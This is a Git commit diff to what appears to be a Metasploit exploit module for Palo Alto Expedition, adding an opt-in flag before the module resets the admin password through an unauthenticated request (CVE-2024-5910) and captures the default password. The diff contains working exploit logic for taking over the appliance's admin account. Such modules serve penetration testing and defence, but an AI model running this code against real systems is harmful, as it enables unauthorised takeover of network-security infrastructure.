safety flag

added a safety flag for the password reset in case no credentials are provided
h4x-x0r · Oct 21, 2024 · b6d3a0e · b6d3a0e
1 parent 202e5e5
commit b6d3a0e
Showing 1 changed file with 24 additions and 18 deletions.
diff --git a/modules/exploits/linux/http/paloalto_expedition_rce.rb b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -65,7 +65,8 @@ def initialize(info = {})
       [
         OptString.new('USERNAME', [false, 'Username for authentication, if available']),
         OptString.new('PASSWORD', [false, 'Password for the specified user']),
-        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/'])
+        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/']),
+        OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false])
       ]
     )
   end
@@ -101,23 +102,28 @@ def xsrf_token_value
 
   def check
     unless datastore['USERNAME'] && datastore['PASSWORD']
-      res = send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
-      )
-
-      return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
-
-      if res.code == 403
-        return CheckCode::Safe
-      end
-
-      return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
-
-      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
-      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
-      datastore['PASSWORD'] = respass
-      datastore['USERNAME'] = 'admin'
+        unless  datastore['RESET_ADMIN_PASSWD']
+           print_bad("No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.")
+           return CheckCode::Unknown
+        end
+
+        res = send_request_cgi(
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+          )
+
+          return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
+
+          if res.code == 403
+            return CheckCode::Safe
+          end
+
+          return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
+
+          respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
+          print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+          datastore['PASSWORD'] = respass
+          datastore['USERNAME'] = 'admin'
     end
 
     begin